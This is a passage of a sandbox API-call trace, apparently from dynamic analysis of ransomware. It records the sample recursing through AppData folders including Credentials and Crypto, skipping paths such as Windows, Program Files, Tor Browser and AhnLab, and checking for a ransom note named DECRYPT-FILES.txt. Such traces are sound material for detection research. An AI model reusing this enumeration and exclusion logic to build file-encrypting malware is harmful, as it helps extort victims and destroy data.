(lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\All Users") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="AhnLab") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.294] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0186.294] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.294] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\0a16c9.tmp") returned 94 [0186.294] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.294] GetLastError () returned 0x5 [0186.294] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0186.294] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.294] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt") returned 101 [0186.294] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.295] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0186.295] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0186.295] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.295] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.296] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.296] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.296] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.296] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.296] CloseHandle (hObject=0xffffffff) returned 0 [0186.296] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", cAlternateFileName="{31810~1")) returned 0 [0186.296] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0186.296] CloseHandle (hObject=0xffffffff) returned 0 [0186.296] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0186.296] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0186.296] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0186.296] lstrcatW (in: lpString1="Microsoft", lpString2="\\" | out: lpString1="Microsoft\\") returned="Microsoft\\" [0186.296] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Microsoft\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Program Files") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch=":\\Windows") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Games\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\All Users") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="AhnLab") returned 0x0 [0186.296] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.296] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0186.296] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.296] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\0a16c9.tmp") returned 54 [0186.297] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.303] GetLastError () returned 0x5 [0186.303] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0186.303] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.303] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt") returned 61 [0186.303] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.307] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0186.307] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0186.307] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0186.308] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.308] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.308] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.308] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.308] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0186.308] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0186.308] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0186.308] lstrcatW (in: lpString1="Credentials", lpString2="\\" | out: lpString1="Credentials\\") returned="Credentials\\" [0186.308] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\" [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Program Files") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch=":\\Windows") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Games\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\All Users") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.308] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.309] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="AhnLab") returned 0x0 [0186.309] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.309] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0186.309] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.309] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\0a16c9.tmp") returned 66 [0186.309] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.309] GetLastError () returned 0x5 [0186.309] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0186.309] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.309] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt") returned 73 [0186.309] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.309] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0186.309] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0186.309] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.309] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.309] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.309] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.309] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.310] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.310] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.310] CloseHandle (hObject=0xffffffff) returned 0 [0186.310] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0186.310] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0186.310] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0186.310] lstrcatW (in: lpString1="Crypto", lpString2="\\" | out: lpString1="Crypto\\") returned="Crypto\\" [0186.310] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\" [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Program Files") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch=":\\Windows") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Games\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\All Users") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="AhnLab") returned 0x0 [0186.310] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.310] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0186.310] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.310] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\0a16c9.tmp") returned 61 [0186.310] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.311] GetLastError () returned 0x5 [0186.311] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0186.311] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.311] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt") returned 68 [0186.311] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.311] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0186.311] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0186.311] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.311] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, 